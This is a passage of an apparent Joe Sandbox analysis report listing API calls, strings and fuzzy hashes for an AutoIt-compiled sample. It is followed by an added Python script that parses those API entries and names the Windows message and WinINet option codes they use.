                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID: ComboBox$ListBox
                                            • API String ID: 3850602802-1403004172
                                            • Opcode ID: 2ea156c08e97e5b988ca56bb60c65a75ae7bc6c4af1c2d43630f1d82ccb1b6da
                                            • Instruction ID: 3e2f44e8ddd11b29466fe15078c8d41bd0e4a017c48a3907651e5464c1c17b14
                                            • Opcode Fuzzy Hash: 2ea156c08e97e5b988ca56bb60c65a75ae7bc6c4af1c2d43630f1d82ccb1b6da
                                            • Instruction Fuzzy Hash: 1E018BB1641108ABCB40EBA8D913AFE73A8FB85344F100119B902F32D2EB645E0987E6
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ClassName_wcscmp
                                            • String ID: #32770
                                            • API String ID: 2292705959-463685578
                                            • Opcode ID: 53b8d8acd4557676c3053230ea0aea940970c53ba59cac3dd8c4fe21662fb4b4
                                            • Instruction ID: 3943d83b16590292e3f5cc66cba470d5c8583353bb714906d384f12695e78b98
                                            • Opcode Fuzzy Hash: 53b8d8acd4557676c3053230ea0aea940970c53ba59cac3dd8c4fe21662fb4b4
                                            • Instruction Fuzzy Hash: 83E0927760432827DB10EAA9AC0AEC7FBACFB61760F010056B915D3181E674A64187D0
                                            APIs
                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0083A63F
                                              • Part of subcall function 008213F1: _doexit.LIBCMT ref: 008213FB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Message_doexit
                                            • String ID: AutoIt$Error allocating memory.
                                            • API String ID: 1993061046-4017498283
                                            • Opcode ID: 44e733e4edcc6c7918e1a4812c15c72f6c38f1ddcef936b92876368a31ae8b1f
                                            • Instruction ID: 22ec209fe5d41051967f4088cad0eb66383ca3aa491f2bb72bc079943fa0e870
                                            • Opcode Fuzzy Hash: 44e733e4edcc6c7918e1a4812c15c72f6c38f1ddcef936b92876368a31ae8b1f
                                            • Instruction Fuzzy Hash: C2D0C2312C032832C21436AC2C1BFC5264CFB25B61F140011BB08D52D259DA858002EA
                                            APIs
                                            • GetSystemDirectoryW.KERNEL32(?), ref: 0087ACC0
                                            • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0087AEBD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: DirectoryFreeLibrarySystem
                                            • String ID: WIN_XPe
                                            • API String ID: 510247158-3257408948
                                            • Opcode ID: 263cc31f20c16b65a3c805a796857c59369277f3de25269ab69ab52810f03f19
                                            • Instruction ID: 47e14327f283f91da072a843cf33dd5f1333a351e26130f19d478400af42a2d2
                                            • Opcode Fuzzy Hash: 263cc31f20c16b65a3c805a796857c59369277f3de25269ab69ab52810f03f19
                                            • Instruction Fuzzy Hash: BEE0C070C04609AFDB1ADBA9D9449ECB7B8FBC8305F14C085E116F2564DB709A84DF22
                                            APIs
                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008686A2
                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 008686B5
                                              • Part of subcall function 00847A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00847AD0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: FindMessagePostSleepWindow
                                            • String ID: Shell_TrayWnd
                                            • API String ID: 529655941-2988720461
                                            • Opcode ID: 8955d6dae2fc5c38138b89161c143707767056304622c122849a5736fdfc6c72
                                            • Instruction ID: 2c4c0468c3997731e7e74009e02009b94338c9aab6176f1f652c45fad6f14c91
                                            • Opcode Fuzzy Hash: 8955d6dae2fc5c38138b89161c143707767056304622c122849a5736fdfc6c72
                                            • Instruction Fuzzy Hash: 56D01271384368B7E274A7749C0BFD67B18FB14B21F100915B759EA2D0C9E4E940C755
                                            APIs
                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008686E2
                                            • PostMessageW.USER32(00000000), ref: 008686E9
                                              • Part of subcall function 00847A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00847AD0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: FindMessagePostSleepWindow
                                            • String ID: Shell_TrayWnd
                                            • API String ID: 529655941-2988720461
                                            • Opcode ID: 93808ed4f427d854be1e04beea4ce5acd5cf6e924ea6668ddf052e6d89b02f27
                                            • Instruction ID: cd554b71d1c681b4741af99e31997d0cb9be9ae20b0c0e34a9783439b4d4cfe9
                                            • Opcode Fuzzy Hash: 93808ed4f427d854be1e04beea4ce5acd5cf6e924ea6668ddf052e6d89b02f27
                                            • Instruction Fuzzy Hash: 0CD012713853687BF274A7749C0BFC67B18FB14B21F100915B755EA2D0C9E4E940C755
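The "APIs" entries in the function listings above print window messages and WinINet option codes as raw hex: the three SendMessageW entries use 0x180, 0x182 and 0x1A2, the InternetSetOptionW entry passes option 0x32 with an 8-byte buffer, and the PostMessageW entry sent to the Shell_TrayWnd window uses 0x111. The following Python is an added example, not part of the Joe Sandbox report, that parses entries in this page's format and names the codes the Windows SDK headers define: 0x111 is WM_COMMAND; 0x180, 0x182 and 0x1A2 are LB_ADDSTRING, LB_DELETESTRING and LB_FINDSTRINGEXACT (consistent with the "ComboBox$ListBox" strings in those functions); 0x32 is INTERNET_OPTION_CONNECTED_STATE, whose INTERNET_CONNECTED_INFO argument is two DWORDs, matching the 8-byte length shown. The line format is inferred from the entries visible on this page, the sample input is copied from them, argument values are the sandbox's stack snapshot (a "?" means it could not resolve the value), and the 0x197 wParam sent to Shell_TrayWnd is left numeric because the report does not identify it.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional

# Entries copied from the report's "APIs" listings (constructed input for this
# example). The report prints unresolved values as '?', numbers as 8 hex digits,
# and string arguments literally.
REPORT_LINES = [
    "• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00854DF5",
    "• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00854E1E",
    "• inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0085A84E",
    "• htons.WSOCK32(00000000,?,00000000), ref: 0085A88B",
    "• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0083B7EF",
    "• SendMessageW.USER32(?,00000180,00000000,?), ref: 0083B6EB",
    "• SendMessageW.USER32(?,00000182,?,00000000), ref: 0083B76C",
    "• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008686A2",
    "• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 008686B5",
    "  • Part of subcall function 00847A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00847AD0",
    "• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0083A63F",
]

# Line shape inferred from the entries above (an assumption about the report format).
LINE_RE = re.compile(
    r"^\W*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX8_RE = re.compile(r"[0-9A-Fa-f]{8}")

# Constant names from the Windows SDK (winuser.h / wininet.h) for the codes
# that occur in the listing. Anything not in these tables stays numeric.
WINDOW_MESSAGES: Dict[int, str] = {
    0x0111: "WM_COMMAND",
    0x0180: "LB_ADDSTRING",
    0x0182: "LB_DELETESTRING",
    0x01A2: "LB_FINDSTRINGEXACT",
}
INTERNET_OPTIONS: Dict[int, str] = {0x32: "INTERNET_OPTION_CONNECTED_STATE"}
# API name -> (0-based argument slot that carries the code, lookup table)
CODE_SLOT = {
    "SendMessageW": (1, WINDOW_MESSAGES),
    "PostMessageW": (1, WINDOW_MESSAGES),
    "InternetSetOptionW": (1, INTERNET_OPTIONS),
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                       # call-site address from "ref:"
    caller: Optional[int] = None   # set for "Part of subcall function" entries
    decoded: Optional[str] = None  # symbolic name of the message/option code

    def arg_int(self, slot: int) -> Optional[int]:
        """Return argument `slot` as an integer, or None if it is '?' or a string."""
        if slot >= len(self.args):
            return None
        tok = self.args[slot]
        return int(tok, 16) if HEX8_RE.fullmatch(tok) else None


def decode_code(call: "ApiCall") -> Optional[str]:
    """Name the message/option code for APIs that take one; None otherwise."""
    spec = CODE_SLOT.get(call.api)
    if spec is None:
        return None
    slot, table = spec
    value = call.arg_int(slot)
    if value is None:
        return None                # '?' in the report: nothing to decode
    return table.get(value, f"0x{value:X}")


def parse_line(line: str) -> Optional[ApiCall]:
    """Parse one "APIs" entry; returns None for lines that are not API entries."""
    m = LINE_RE.match(line)
    if not m:
        return None
    call = ApiCall(
        api=m["api"],
        module=m["module"],
        args=[a.strip() for a in m["args"].split(",")],
        ref=int(m["ref"], 16),
        caller=int(m["caller"], 16) if m["caller"] else None,
    )
    call.decoded = decode_code(call)
    return call


def parse_report(lines: List[str]) -> List[ApiCall]:
    return [c for c in (parse_line(l) for l in lines) if c is not None]


def module_summary(calls: List[ApiCall]) -> Dict[str, int]:
    """Count calls per imported module: a quick capability view of a dump."""
    return dict(Counter(c.module for c in calls))


if __name__ == "__main__":
    calls = parse_report(REPORT_LINES)
    for c in calls:
        tag = f" [{c.decoded}]" if c.decoded else ""
        print(f"{c.ref:08X} {c.module}!{c.api}({', '.join(c.args)}){tag}")
    print(module_summary(calls))
```

Only codes the tables know are named; an unknown code in a decodable slot is printed as hex rather than guessed, and a "?" slot yields no decode at all, so the output never claims more than the snapshot supports.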